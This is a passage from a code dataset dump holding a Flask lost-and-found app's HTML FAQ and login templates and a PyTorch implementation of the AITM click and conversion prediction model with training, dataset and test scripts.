nullable=False, default=0)\n posted_at = db.Column(DateTime(timezone=True))\n\n\nclass Avatars(UserMixin, Base):\n __tablename__ = \"Avatars\"\n\n avatarId = db.Column(db.String, primary_key=True)\n name = db.Column(db.String)\n coinsRequired = db.Column(db.Integer, default=0)\n\n\nclass UserAvatars(UserMixin, Base):\n __tablename__ = \"userAvatars\"\n\n avatarId = db.Column(db.String, primary_key=True)\n userId = db.Column(db.String, ForeignKey('users.id'), primary_key=True)\n"
},
{
"alpha_fraction": 0.27248382568359375,
"alphanum_fraction": 0.2748938500881195,
"avg_line_length": 64.5216293334961,
"blob_id": "d8560a8bad261b51cdec197aed2de4f9d5c158aa",
"content_id": "b243979d3d87280dd7570a8d7f804f4f81dfb32c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "HTML",
"length_bytes": 26155,
"license_type": "no_license",
"max_line_length": 120,
"num_lines": 393,
"path": "/app/templates/faq.html",
"repo_name": "moudNM/queseek",
"src_encoding": "UTF-8",
"text": "<!DOCTYPE html>\r\n<html lang=\"zxx\">\r\n\r\n<head>\r\n <meta charset=\"UTF-8\">\r\n <meta name=\"description\" content=\"Queseek\">\r\n <meta name=\"keywords\" content=\"Queseek, quest, seek\">\r\n <meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\">\r\n <meta http-equiv=\"X-UA-Compatible\" content=\"ie=edge\">\r\n <title>Queseek</title>\r\n{% include \"base/icon.html\" %}\r\n <!-- Google Font -->\r\n <link href=\"https://fonts.googleapis.com/css?family=Muli:300,400,500,600,700,800,900&display=swap\" rel=\"stylesheet\">\r\n\r\n <!-- Css Styles -->\r\n <link rel=\"stylesheet\" href=\"{{ url_for('static', filename='css/bootstrap.min.css')}}\" type=\"text/css\">\r\n <link rel=\"stylesheet\" href=\"{{ url_for('static', filename='css/font-awesome.min.css')}}\" type=\"text/css\">\r\n <link rel=\"stylesheet\" href=\"{{ url_for('static', filename='css/themify-icons.css')}}\" type=\"text/css\">\r\n <link rel=\"stylesheet\" href=\"{{ url_for('static', filename='css/elegant-icons.css')}}\" type=\"text/css\">\r\n <link rel=\"stylesheet\" href=\"{{ url_for('static', filename='css/owl.carousel.min.css')}}\" type=\"text/css\">\r\n <link rel=\"stylesheet\" href=\"{{ url_for('static', filename='css/nice-select.css')}}\" type=\"text/css\">\r\n <link rel=\"stylesheet\" href=\"{{ url_for('static', filename='css/jquery-ui.min.css')}}\" type=\"text/css\">\r\n <link rel=\"stylesheet\" href=\"{{ url_for('static', filename='css/slicknav.min.css')}}\" type=\"text/css\">\r\n <link rel=\"stylesheet\" href=\"{{ url_for('static', filename='css/style.css')}}\" type=\"text/css\">\r\n <link rel=\"stylesheet\" href=\"{{ url_for('static', filename='css/table.css')}}\" type=\"text/css\">\r\n</head>\r\n\r\n<body>\r\n\r\n\r\n<!-- Page Preloder -->\r\n<div id=\"preloder\">\r\n <div class=\"loader\"></div>\r\n</div>\r\n\r\n<!-- Header Section Begin -->\r\n<header class=\"header-section\">\r\n\r\n {% include \"base/topbar.html\" %}\r\n {% include \"base/menu.html\" %}\r\n\r\n</header>\r\n<!-- Header End -->\r\n\r\n\r\n<!-- Hero Section Begin -->\r\n<section class=\"hero-section\">\r\n <div class=\"hero-items\">\r\n\r\n <div class=\"topbar-cover2\">\r\n <div class=\"desc\">\r\n\r\n <section class=\"cd-faq\">\r\n\r\n <div class=\"cd-faq-categories\">\r\n\r\n {% if page == 'points_system' %}\r\n <a href=\"{{url_for('faq_general')}}\">General</a>\r\n <a class=\"active\" href=\"{{url_for('faq_points_system')}}\">Points System</a>\r\n <a href=\"{{url_for('faq_seekers')}}\">Seekers</a>\r\n\r\n {% elif page == 'seekers' %}\r\n <a href=\"{{url_for('faq_general')}}\">General</a>\r\n <a href=\"{{url_for('faq_points_system')}}\">Points System</a>\r\n <a class=\"active\" href=\"{{url_for('faq_seekers')}}\">Seekers</a>\r\n\r\n {% else %}\r\n <a class=\"active\" href=\"{{url_for('faq_general')}}\">General</a>\r\n <a href=\"{{url_for('faq_points_system')}}\">Points System</a>\r\n <a href=\"{{url_for('faq_seekers')}}\">Seekers</a>\r\n\r\n\r\n {% endif %}\r\n </div>\r\n\r\n\r\n <!-- Faq Section Begin -->\r\n <div class=\"faq-section spad\">\r\n <div class=\"container\">\r\n <div class=\"row\">\r\n <div class=\"col-lg-12\">\r\n <div class=\"faq-accordin\">\r\n <div class=\"accordion\" id=\"accordionExample\">\r\n {% if page == 'points_system' %}\r\n <div class=\"card\">\r\n <div class=\"card-heading\">\r\n <a data-toggle=\"collapse\" data-target=\"#collapseOne\">\r\n Points for Quests\r\n </a>\r\n </div>\r\n <div id=\"collapseOne\" class=\"collapse\" data-parent=\"#accordionExample\">\r\n <div class=\"card-body\">\r\n <p>Hero Quests: (20 coins per post) -Limited to 3 posts of lost\r\n item(s) per user\r\n <br>Side Quests: (5 coins)- Eg: Errands such as printing\r\n notes / Collab\r\n <br>There are three levels of quests and this will affect\r\n the order the Quests\r\n are displayed on the Quest Home page. All quests are posted\r\n based on the time it\r\n was submitted (i.e. Most recent to older posts). The level 3\r\n will be displayed\r\n at the top while level 2 and level 1 below it.\r\n <br>*Level is dependent on the user who posts the quests.\r\n For Level 2 and 3 the\r\n user who post the quests will need to contribute their\r\n points according to the\r\n surplus of the level.\r\n\r\n\r\n Example:\r\n <br>Level 1 - 20 coins from system\r\n <br>Level 2 - 20 coins from system and 10 coins from the\r\n user.\r\n <br>Level 3 - 20 coins from system and 20 coins from the\r\n user.\r\n </p>\r\n </div>\r\n </div>\r\n </div>\r\n <div class=\"card\">\r\n <div class=\"card-heading\">\r\n <a data-toggle=\"collapse\" data-target=\"#collapseTwo\">\r\n How about featured quests?\r\n </a>\r\n </div>\r\n <div id=\"collapseTwo\" class=\"collapse\" data-parent=\"#accordionExample\">\r\n <div class=\"card-body\">\r\n <p>(Additional 5 coins on top of the existing points for the\r\n quests)\r\n <ul style=\"list-style-type: circle\">\r\n <li>Only limited to users based on the Top 20% weekly coins\r\n ranking.\r\n </li>\r\n <li>Each user can only attempt up to 3 featured quests in a\r\n week.\r\n </li>\r\n <li> First 5 users to complete the featured quest will get 5\r\n coins, the next 5\r\n will get 0.5x (2.5 coins)\r\n </li>\r\n </ul>\r\n </p>\r\n </div>\r\n </div>\r\n </div>\r\n\r\n {% elif page == 'seekers' %}\r\n <div class=\"card\">\r\n <div class=\"card-heading\">\r\n <a data-toggle=\"collapse\" data-target=\"#collapseOne\">\r\n What can I do with the coins?\r\n </a>\r\n </div>\r\n <div id=\"collapseOne\" class=\"collapse\" data-parent=\"#accordionExample\">\r\n <div class=\"card-body\">\r\n <p>Users can use the accumulated coins that they received from\r\n completing the quests\r\n for the following purpose:\r\n <ul style=\"list-style-type: circle;\">\r\n <li>The coins earned will help the user to level up. At a\r\n higher level, the user\r\n will have access to more quests.\r\n </li>\r\n <li>They can unlock a new avatar.</li>\r\n <li>The points can be used to change the level of the quests\r\n that the users\r\n posted.\r\n </li>\r\n </ul>\r\n </p>\r\n </div>\r\n </div>\r\n </div>\r\n <div class=\"card\">\r\n <div class=\"card-heading\">\r\n <a data-toggle=\"collapse\" data-target=\"#collapseTwo\">\r\n Where can I check the quests that I have\r\n accepted?\r\n </a>\r\n </div>\r\n <div id=\"collapseTwo\" class=\"collapse\" data-parent=\"#accordionExample\">\r\n <div class=\"card-body\">\r\n <p>Seekers can go to their profile page and under it will show a\r\n list of quests that\r\n they have previously accepted.</p>\r\n </div>\r\n </div>\r\n </div>\r\n <div class=\"card\">\r\n <div class=\"card-heading\">\r\n <a data-toggle=\"collapse\" data-target=\"#collapseThree\">\r\n How should I verify the lost item(s) with the\r\n rightful owner?\r\n </a>\r\n </div>\r\n <div id=\"collapseThree\" class=\"collapse\"\r\n data-parent=\"#accordionExample\">\r\n <div class=\"card-body\">\r\n <p>In the event of a meetup, the rightful owner should either\r\n have a prove of\r\n identification that the item belongs to him/her or the\r\n description of the lost\r\n item(s) provided by the seekers should accurately matched\r\n with the information\r\n given by the owner of lost item(s).</p>\r\n </div>\r\n </div>\r\n </div>\r\n {% else %}\r\n <div class=\"card\">\r\n <div class=\"card-heading\">\r\n <a data-toggle=\"collapse\" data-target=\"#collapseOne\">\r\n What is Queseek?\r\n </a>\r\n </div>\r\n <div id=\"collapseOne\" class=\"collapse\" data-parent=\"#accordionExample\">\r\n <div class=\"card-body\">\r\n <p>Queseek is a platform that builds a community of people by\r\n completing different\r\n types of quests together.\r\n </p>\r\n </div>\r\n </div>\r\n </div>\r\n <div class=\"card\">\r\n <div class=\"card-heading\">\r\n <a data-toggle=\"collapse\" data-target=\"#collapseTwo\">\r\n What are the different types of quests and\r\n seeks?\r\n </a>\r\n </div>\r\n <div id=\"collapseTwo\" class=\"collapse\" data-parent=\"#accordionExample\">\r\n <div class=\"card-body\">\r\n <p>There are two types of quests: Hero Quests and Side Quests.\r\n <br>\r\n Hero Quests are quest posted by people who have reported\r\n their\r\n item\r\n as lost.\r\n <br>\r\n Side Quests are interactive mini-games that users can take\r\n part\r\n in\r\n to earn some\r\n bonus points.\r\n <br>\r\n The two type of side quests are Collaborative based and\r\n Community\r\n based.\r\n <br>\r\n <ul style=\"list-style-type:disc\">\r\n <li>Collaborative Based: Companies & Administrators posts\r\n quests\r\n such as finding\r\n QR code around campus.\r\n </li>\r\n <li>Community Based: Helping other students to run errands\r\n in\r\n school\r\n such as\r\n printing lecture notes or buying takeaways.\r\n </li>\r\n </ul>\r\n\r\n <br>\r\n Seeks are the list of found items that have been reported to the\r\n system.\r\n </p>\r\n </div>\r\n </div>\r\n </div>\r\n <div class=\"card\">\r\n <div class=\"card-heading\">\r\n <a data-toggle=\"collapse\" data-target=\"#collapseThree\">\r\n What are featured quests?\r\n </a>\r\n </div>\r\n <div id=\"collapseThree\" class=\"collapse\"\r\n data-parent=\"#accordionExample\">\r\n <div class=\"card-body\">\r\n <p>They are quests that have been featured by the moderators of\r\n Queseek.\r\n These\r\n quests are usually available for a limited time only as a\r\n collaborations with\r\n other organisation or for an event. Featured quests will\r\n have\r\n bonus\r\n points\r\n available for uses to earn.</p>\r\n </div>\r\n </div>\r\n </div>\r\n <div class=\"card\">\r\n <div class=\"card-heading\">\r\n <a data-toggle=\"collapse\" data-target=\"#collapseFour\">\r\n I have lost my belongings. What should I do?\r\n </a>\r\n </div>\r\n <div id=\"collapseFour\" class=\"collapse\"\r\n data-parent=\"#accordionExample\">\r\n <div class=\"card-body\">\r\n <p>Firstly, users can browse through the Seek reported to see if\r\n their\r\n item have\r\n already been found by others are are already reported on the\r\n website. If the\r\n user can’t find any listing of their item, they can post a\r\n Quest\r\n report.\r\n <br>Simply click on the “Report your lost item” button on\r\n the\r\n right\r\n hand side of\r\n the page to submit a report.</p>\r\n </div>\r\n </div>\r\n </div>\r\n\r\n <div class=\"card\">\r\n <div class=\"card-heading\">\r\n <a data-toggle=\"collapse\" data-target=\"#collapseFive\">\r\n I found an item in school. What can I do?\r\n </a>\r\n </div>\r\n <div id=\"collapseFive\" class=\"collapse\"\r\n data-parent=\"#accordionExample\">\r\n <div class=\"card-body\">\r\n <p>Simply click on the “Report a seek” button on our home page,\r\n fill\r\n up\r\n the form and\r\n submit it!\r\n Fill up the basic information of the item you found and\r\n double\r\n check\r\n with the\r\n owner for the specific information such as “What cards are\r\n in\r\n the\r\n wallet?”\r\n before returning it to the owner. If you are not available\r\n to\r\n meet\r\n up with the\r\n owner, you may pass the item to the security counter of the\r\n school.</p>\r\n </div>\r\n </div>\r\n </div>\r\n\r\n\r\n {% endif %}\r\n\r\n\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n\r\n\r\n <!-- Faq Section End -->\r\n\r\n\r\n </section>\r\n\r\n\r\n </div>\r\n </div>\r\n\r\n\r\n </div>\r\n</section>\r\n\r\n\r\n<!-- Hero Section End -->\r\n\r\n<!-- Js Plugins -->\r\n<script src=\"{{url_for('static', filename='js/jquery-3.3.1.min.js')}}\"></script>\r\n<script src=\"{{url_for('static', filename='js/bootstrap.min.js')}}\"></script>\r\n<script src=\"{{url_for('static', filename='js/jquery-ui.min.js')}}\"></script>\r\n<script src=\"{{url_for('static', filename='js/jquery.countdown.min.js')}}\"></script>\r\n<script src=\"{{url_for('static', filename='js/jquery.nice-select.min.js')}}\"></script>\r\n<script src=\"{{url_for('static', filename='js/jquery.zoom.min.js')}}\"></script>\r\n<script src=\"{{url_for('static', filename='js/jquery.dd.min.js')}}\"></script>\r\n<script src=\"{{url_for('static', filename='js/jquery.slicknav.js')}}\"></script>\r\n<script src=\"{{url_for('static', filename='js/main.js')}}\"></script>\r\n<script src=\"{{url_for('static', filename='js/table.js')}}\"></script>\r\n</body>\r\n\r\n</html>"
},
{
"alpha_fraction": 0.47862231731414795,
"alphanum_fraction": 0.48099762201309204,
"avg_line_length": 26,
"blob_id": "8498ebf0bb5b66f23c426f50f7f159a68bb83471",
"content_id": "1b9f8b65ac903c8512770724b373ffe84369f169",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "HTML",
"length_bytes": 842,
"license_type": "no_license",
"max_line_length": 97,
"num_lines": 31,
"path": "/app/templates/base/loginlogout.html",
"repo_name": "moudNM/queseek",
"src_encoding": "UTF-8",
"text": "<div class=\"ht-right\">\n\n <div class=\"login-panel\">\n\n {% if current_user.is_anonymous %}\n\n <a href=\"{{ url_for('signup') }} \" class=\"log-btn\">SIGN UP</a>\n <a href=\"{{ url_for('login') }} \" class=\"log-btn\">LOG IN</a>\n\n {% else %}\n\n <a href=\"{{ url_for('logout') }}\" class=\"log-btn\">LOG OUT</a>\n <a href=\"{{ url_for('settings') }}\" class=\"settings-btn\">SETTINGS</a>\n {% endif %}\n\n </div>\n\n {% if current_user.is_anonymous %}\n {% else %}\n <div class=\"login-panel\">\n <a href=\"{{url_for('profile')}}\">\n <img src=\"{{ url_for('static', filename='img/avatars/'+current_user_avatar+'.png')}}\"\n width=\"50\">\n </a>\n\n <a href=\"{{ url_for('profile') }}\" class=\"user-btn\"> {{ current_user.username }}</a>\n </div>\n {% endif %}\n\n\n</div>\n\n\n\n\n\n"
}
] | 10 |
rockyzhengwu/AITM-torch | https://github.com/rockyzhengwu/AITM-torch | c877487bad0aaf0d5bb0686f0f40c26e9a5f858a | 674b5bbef50b5f7c96dc3a70d88a90ddd25c9ce8 | 78e82ffd7be8a7c7aa9fa91437ad75e99efcc14d | refs/heads/master | 2023-07-11T04:37:13.151772 | 2021-08-19T02:29:28 | 2021-08-19T02:29:28 | null | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.7441860437393188,
"alphanum_fraction": 0.7545219659805298,
"avg_line_length": 28.769229888916016,
"blob_id": "210270dbfd4758b26a5d270c7484a23c482ef4ea",
"content_id": "5d3bd38c2621d05746066c110b0d047de3bc5b9e",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 387,
"license_type": "permissive",
"max_line_length": 64,
"num_lines": 13,
"path": "/dataset_test.py",
"repo_name": "rockyzhengwu/AITM-torch",
"src_encoding": "UTF-8",
"text": "from torch.utils.data import DataLoader\nfrom dataset import XDataset\n\ndatafile = './data/ctr_cvr.dev'\ndataset = XDataset(datafile)\n\ndataloader = DataLoader(dataset, batch_size=1000, shuffle=False)\nfor i, value in enumerate(dataloader):\n click, conversion, features = value\n print(click.shape)\n print(conversion.shape)\n for key in features.keys():\n print(key, features[key].shape)\n"
},
{
"alpha_fraction": 0.554428219795227,
"alphanum_fraction": 0.5874022245407104,
"avg_line_length": 27.329341888427734,
"blob_id": "0edd073394efca02fbf676758377e00dc8630888",
"content_id": "ded384b7f4a10d66631ec8305e828b0cc1215df7",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4731,
"license_type": "permissive",
"max_line_length": 76,
"num_lines": 167,
"path": "/train.py",
"repo_name": "rockyzhengwu/AITM-torch",
"src_encoding": "UTF-8",
"text": "import sys\nimport random\nimport torch\nfrom torch import nn\nfrom torch.utils.data import DataLoader\nimport dataset\nfrom model import AITM\nimport numpy as np\nfrom sklearn.metrics import roc_auc_score\n\n\n# super parameter\nbatch_size = 2000\nembedding_size = 5\nlearning_rate = 0.0001\ntotal_epoch = 10\nearlystop_epoch = 1\n\nvocabulary_size = {\n '101': 238635,\n '121': 98,\n '122': 14,\n '124': 3,\n '125': 8,\n '126': 4,\n '127': 4,\n '128': 3,\n '129': 5,\n '205': 467298,\n '206': 6929,\n '207': 263942,\n '216': 106399,\n '508': 5888,\n '509': 104830,\n '702': 51878,\n '853': 37148,\n '301': 4\n}\n\nmodel_file = './out/AITM.model'\n\n\ndef get_dataloader(filename, batch_size, shuffle):\n data = dataset.XDataset(filename)\n loader = DataLoader(data, batch_size=batch_size, shuffle=shuffle)\n return loader\n\n\ndef train():\n train_dataloader = get_dataloader('./data/ctr_cvr.train',\n batch_size,\n shuffle=True)\n dev_dataloader = get_dataloader('./data/ctr_cvr.dev',\n batch_size,\n shuffle=True)\n model = AITM(vocabulary_size, embedding_size)\n device = torch.device(\"cuda:1\" if torch.cuda.is_available() else \"cpu\")\n optimizer = torch.optim.Adam(model.parameters(),\n lr=learning_rate,\n weight_decay=1e-6)\n model.to(device)\n best_acc = 0.0\n earystop_count = 0\n best_epoch = 0\n for epoch in range(total_epoch):\n total_loss = 0.\n nb_sample = 0\n # train\n model.train()\n for step, batch in enumerate(train_dataloader):\n click, conversion, features = batch\n for key in features.keys():\n features[key] = features[key].to(device)\n click_pred, conversion_pred = model(features)\n loss = model.loss(click.float(),\n click_pred,\n conversion.float(),\n conversion_pred,\n device=device)\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n total_loss += loss\n nb_sample += click.shape[0]\n if step % 200 == 0:\n print('[%d] Train loss on step %d: %.6f' %\n (nb_sample, (step + 1), total_loss / (step + 1)))\n\n # validation\n print(\"start validation...\")\n click_pred = []\n click_label = []\n conversion_pred = []\n conversion_label = []\n model.eval()\n for step, batch in enumerate(dev_dataloader):\n click, conversion, features = batch\n for key in features.keys():\n features[key] = features[key].to(device)\n\n with torch.no_grad():\n click_prob, conversion_prob = model(features)\n\n click_pred.append(click_prob.cpu())\n conversion_pred.append(conversion_prob.cpu())\n\n click_label.append(click)\n conversion_label.append(conversion)\n\n click_auc = cal_auc(click_label, click_pred)\n conversion_auc = cal_auc(conversion_label, conversion_pred)\n print(\"Epoch: {} click_auc: {} conversion_auc: {}\".format(\n epoch + 1, click_auc, conversion_auc))\n\n acc = click_auc + conversion_auc\n if best_acc < acc:\n best_acc = acc\n best_epoch = epoch + 1\n torch.save(model.state_dict(), model_file)\n earystop_count = 0\n else:\n print(\"train stop at Epoch %d based on the base validation Epoch %d\" %\n (epoch + 1, best_epoch))\n return\n\n\ndef test():\n print(\"Start Test ...\")\n test_loader = get_dataloader('./data/ctr_cvr.test',\n batch_size=batch_size,\n shuffle=False)\n model = AITM(vocabulary_size, 5)\n model.load_state_dict(torch.load(model_file))\n model.eval()\n click_list = []\n conversion_list = []\n click_pred_list = []\n conversion_pred_list = []\n for i, batch in enumerate(test_loader):\n if i % 1000:\n sys.stdout.write(\"test step:{}\\r\".format(i))\n sys.stdout.flush()\n click, conversion, features = batch\n with torch.no_grad():\n click_pred, conversion_pred = model(features)\n click_list.append(click)\n conversion_list.append(conversion)\n click_pred_list.append(click_pred)\n conversion_pred_list.append(conversion_pred)\n click_auc = cal_auc(click_list, click_pred_list)\n conversion_auc = cal_auc(conversion_list, conversion_pred_list)\n print(\"Test Resutt: click AUC: {} conversion AUC:{}\".format(\n click_auc, conversion_auc))\n\n\ndef cal_auc(label: list, pred: list):\n label = torch.cat(label)\n pred = torch.cat(pred)\n label = label.detach().numpy()\n pred = pred.detach().numpy()\n auc = roc_auc_score(label, pred, labels=np.array([0.0, 1.0]))\n return auc\n\n\nif __name__ == \"__main__\":\n train()\n test()\n"
},
{
"alpha_fraction": 0.5786557197570801,
"alphanum_fraction": 0.5940737128257751,
"avg_line_length": 34.784481048583984,
"blob_id": "8ecc67055ef7cf2e8c32a45378d494aa6211e58a",
"content_id": "d9b2dec04f857b38ef506a58440cae095343f44c",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4151,
"license_type": "permissive",
"max_line_length": 79,
"num_lines": 116,
"path": "/model.py",
"repo_name": "rockyzhengwu/AITM-torch",
"src_encoding": "UTF-8",
"text": "import torch\nfrom torch import nn\n\n\nclass Tower(nn.Module):\n def __init__(self,\n input_dim: int,\n dims=[128, 64, 32],\n drop_prob=[0.1, 0.3, 0.3]):\n super(Tower, self).__init__()\n self.dims = dims\n self.drop_prob = drop_prob\n self.layer = nn.Sequential(nn.Linear(input_dim, dims[0]), nn.ReLU(),\n nn.Dropout(drop_prob[0]),\n nn.Linear(dims[0], dims[1]), nn.ReLU(),\n nn.Dropout(drop_prob[1]),\n nn.Linear(dims[1], dims[2]), nn.ReLU(),\n nn.Dropout(drop_prob[2]))\n\n def forward(self, x):\n x = torch.flatten(x, start_dim=1)\n x = self.layer(x)\n return x\n\n\nclass Attention(nn.Module):\n def __init__(self, dim=32):\n super(Attention, self).__init__()\n self.dim = dim\n self.q_layer = nn.Linear(dim, dim, bias=False)\n self.k_layer = nn.Linear(dim, dim, bias=False)\n self.v_layer = nn.Linear(dim, dim, bias=False)\n self.softmax = nn.Softmax(dim=1)\n\n def forward(self, inputs):\n Q = self.q_layer(inputs)\n K = self.k_layer(inputs)\n V = self.v_layer(inputs)\n a = torch.sum(torch.mul(Q, V), -1) / torch.sqrt(torch.tensor(self.dim))\n a = self.softmax(a)\n outputs = torch.sum(torch.mul(torch.unsqueeze(a, -1), V), dim=1)\n return outputs\n\n\nclass AITM(nn.Module):\n def __init__(self,\n feature_vocabulary: dict[str, int],\n embedding_size: int,\n tower_dims=[128, 64, 32],\n drop_prob=[0.1, 0.3, 0.3]):\n super(AITM, self).__init__()\n self.feature_vocabulary = feature_vocabulary\n self.feature_names = sorted(list(feature_vocabulary.keys()))\n self.embedding_size = embedding_size\n self.embedding_dict = nn.ModuleDict()\n self.__init_weight()\n\n self.tower_input_size = len(feature_vocabulary) * embedding_size\n self.click_tower = Tower(self.tower_input_size, tower_dims, drop_prob)\n self.conversion_tower = Tower(self.tower_input_size, tower_dims, drop_prob)\n self.attention_layer = Attention(tower_dims[-1])\n\n self.info_layer = nn.Sequential(nn.Linear(tower_dims[-1], 32), nn.ReLU(),\n nn.Dropout(drop_prob[-1]))\n\n self.click_layer = nn.Sequential(nn.Linear(tower_dims[-1], 1),\n nn.Sigmoid())\n self.conversion_layer = nn.Sequential(nn.Linear(tower_dims[-1], 1),\n nn.Sigmoid())\n\n def __init_weight(self, ):\n for name, size in self.feature_vocabulary.items():\n emb = nn.Embedding(size, self.embedding_size)\n nn.init.normal_(emb.weight, mean=0.0, std=0.01)\n self.embedding_dict[name] = emb\n\n def forward(self, x):\n feature_embedding = []\n for name in self.feature_names:\n embed = self.embedding_dict[name](x[name])\n feature_embedding.append(embed)\n feature_embedding = torch.cat(feature_embedding, 1)\n tower_click = self.click_tower(feature_embedding)\n\n tower_conversion = torch.unsqueeze(\n self.conversion_tower(feature_embedding), 1)\n\n info = torch.unsqueeze(self.info_layer(tower_click), 1)\n\n ait = self.attention_layer(torch.cat([tower_conversion, info], 1))\n\n click = torch.squeeze(self.click_layer(tower_click), dim=1)\n conversion = torch.squeeze(self.conversion_layer(ait), dim=1)\n\n return click, conversion\n\n def loss(self,\n click_label,\n click_pred,\n conversion_label,\n conversion_pred,\n constraint_weight=0.6,\n device=\"gpu:1\"):\n click_label = click_label.to(device)\n conversion_label = conversion_label.to(device)\n\n click_loss = nn.functional.binary_cross_entropy(click_pred, click_label)\n conversion_loss = nn.functional.binary_cross_entropy(\n conversion_pred, conversion_label)\n\n label_constraint = torch.maximum(conversion_label - click_label,\n torch.zeros_like(click_label))\n constraint_loss = torch.sum(label_constraint)\n\n loss = click_loss + conversion_loss + constraint_weight * constraint_loss\n return loss\n"
},
{
"alpha_fraction": 0.5429936051368713,
"alphanum_fraction": 0.5891719460487366,
"avg_line_length": 22.259260177612305,
"blob_id": "0098c2d8959b3d5dfe3932e0219ac8b0dd37547c",
"content_id": "9332d8af8ce85e7019b91897b0f3ef8ab4c0b92d",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 628,
"license_type": "permissive",
"max_line_length": 65,
"num_lines": 27,
"path": "/model_test.py",
"repo_name": "rockyzhengwu/AITM-torch",
"src_encoding": "UTF-8",
"text": "import model\nimport torch\n\n\ndef test_model():\n\n feature_vocab = {\"0\": 10, \"1\": 12, \"2\": 20}\n embedding_size = 4\n m = model.AITM(feature_vocab, embedding_size)\n inputs = {\n \"0\": torch.tensor([[1], [2]]),\n \"1\": torch.tensor([[2], [3]]),\n \"2\": torch.tensor([[10], [11]])\n }\n click, conversion = m(inputs)\n print(\"click_pred:\", click.shape)\n print(\"covnersion_pred:\", conversion.shape)\n\n click_label = torch.tensor([1.0, 1.0])\n conversion_label = torch.tensor([1.0, 0.0])\n\n loss = m.loss(click_label, click, conversion_label, conversion)\n print(\"loss: \", loss)\n\n\nif __name__ == \"__main__\":\n test_model()\n"
},
{
"alpha_fraction": 0.6069600582122803,
"alphanum_fraction": 0.6131013035774231,
"avg_line_length": 27.735294342041016,
"blob_id": "215828c115928d40469549bc05cdb1e89c42af76",
"content_id": "88d2bfe76202c8ed701b4d54e71744ded6dcb41b",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 977,
"license_type": "permissive",
"max_line_length": 62,
"num_lines": 34,
"path": "/dataset.py",
"repo_name": "rockyzhengwu/AITM-torch",
"src_encoding": "UTF-8",
"text": "from torch.utils.data import DataLoader\nfrom torch.utils.data import Dataset\n\n\nclass XDataset(Dataset):\n '''load csv data with feature name ad first row'''\n def __init__(self, datafile):\n super(XDataset, self).__init__()\n self.feature_names = []\n self.datafile = datafile\n self.data = []\n self._load_data()\n\n def _load_data(self):\n print(\"start load data from: {}\".format(self.datafile))\n count = 0\n with open(self.datafile) as f:\n self.feature_names = f.readline().strip().split(',')[2:]\n for line in f:\n count += 1\n line = line.strip().split(',')\n line = [int(v) for v in line]\n self.data.append(line)\n print(\"load data from {} finished\".format(self.datafile))\n\n def __len__(self, ):\n return len(self.data)\n\n def __getitem__(self, idx):\n line = self.data[idx]\n click = line[0]\n conversion = line[1]\n features = dict(zip(self.feature_names, line[2:]))\n return click, conversion, features\n"
},
{
"alpha_fraction": 0.6812030076980591,
"alphanum_fraction": 0.7503759264945984,
"avg_line_length": 23.55555534362793,
"blob_id": "74410625da44e0f0c62cb93e084075146484314b",
"content_id": "932354c505c7173d691ee5619e974c5361c38dd6",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 665,
"license_type": "permissive",
"max_line_length": 188,
"num_lines": 27,
"path": "/README.md",
"repo_name": "rockyzhengwu/AITM-torch",
"src_encoding": "UTF-8",
"text": "# AITM-torch\n\n- [Official Tensorflow implementation](https://github.com/xidongbo/AITM)\n- [Paper](https://arxiv.org/abs/2105.08489)\n\n## Dataset\n\nDownload and preprocess dataset use [script](https://github.com/xidongbo/AITM/blob/main/process_public_dataset.py) in [official Tensorflow implementation](https://github.com/xidongbo/AITM)\n```python\npython process_public_dataset.py\n\n```\n\n## Train && Test\n\n```\nmkdir out\npython train.py\n```\n\n## AUC performance\n\nTest AUC on [Alibaba Click and Conversion Prediction](https://tianchi.aliyun.com/datalab/dataSet.html?dataId=408) dataset\n\n```\nTest Resutt: click AUC: 0.6189267022220789 conversion AUC:0.6544229866061039\n```\n\n\n"
}
] | 6 |
ericlin1001/AutomateTheBoringStuff | https://github.com/ericlin1001/AutomateTheBoringStuff | 0b8804767c38b3207b60d5afce1ec2174dc3699d | 28ce29e5e6b8e399628a1f820738116f250d88d8 | ba6edeebf985473aefb0949eb393f3a52ab8e613 | refs/heads/master | 2021-01-01T05:44:27.625220 | 2016-04-13T05:33:01 | 2016-04-13T05:33:01 | 56,124,773 | 1 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5025380849838257,
"alphanum_fraction": 0.5228426456451416,
"avg_line_length": 13.071428298950195,
"blob_id": "72d93fc2d2cf191cfe552bbb4605e4b996f551bd",
"content_id": "3f8611fca43632c06be70b58d53719523bfa8594",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 197,
"license_type": "no_license",
"max_line_length": 31,
"num_lines": 14,
"path": "/saveVar.py",
"repo_name": "ericlin1001/AutomateTheBoringStuff",
"src_encoding": "UTF-8",
"text": "import shelve\n\nsf = shelve.open('shelvedata');\nsf.setdefault('a', 0);\nsf.setdefault('b', 0);\na = sf['a'];\nb = sf['b'];\nprint(a);\nprint(b);\na =a + 1;\nb = b + 1;\nsf['a'] = a\nsf['b'] = b;\nsf.close();\n"
},
{
"alpha_fraction": 0.47448521852493286,
"alphanum_fraction": 0.48075202107429504,
"avg_line_length": 26.924999237060547,
"blob_id": "96ad0669f114e7453cd7ef9fb398cf95639fa2e0",
"content_id": "bbddcb7f29f4dd79c4bd160f1dc2ef6cb313f2d4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1117,
"license_type": "no_license",
"max_line_length": 77,
"num_lines": 40,
"path": "/printTable.py",
"repo_name": "ericlin1001/AutomateTheBoringStuff",
"src_encoding": "UTF-8",
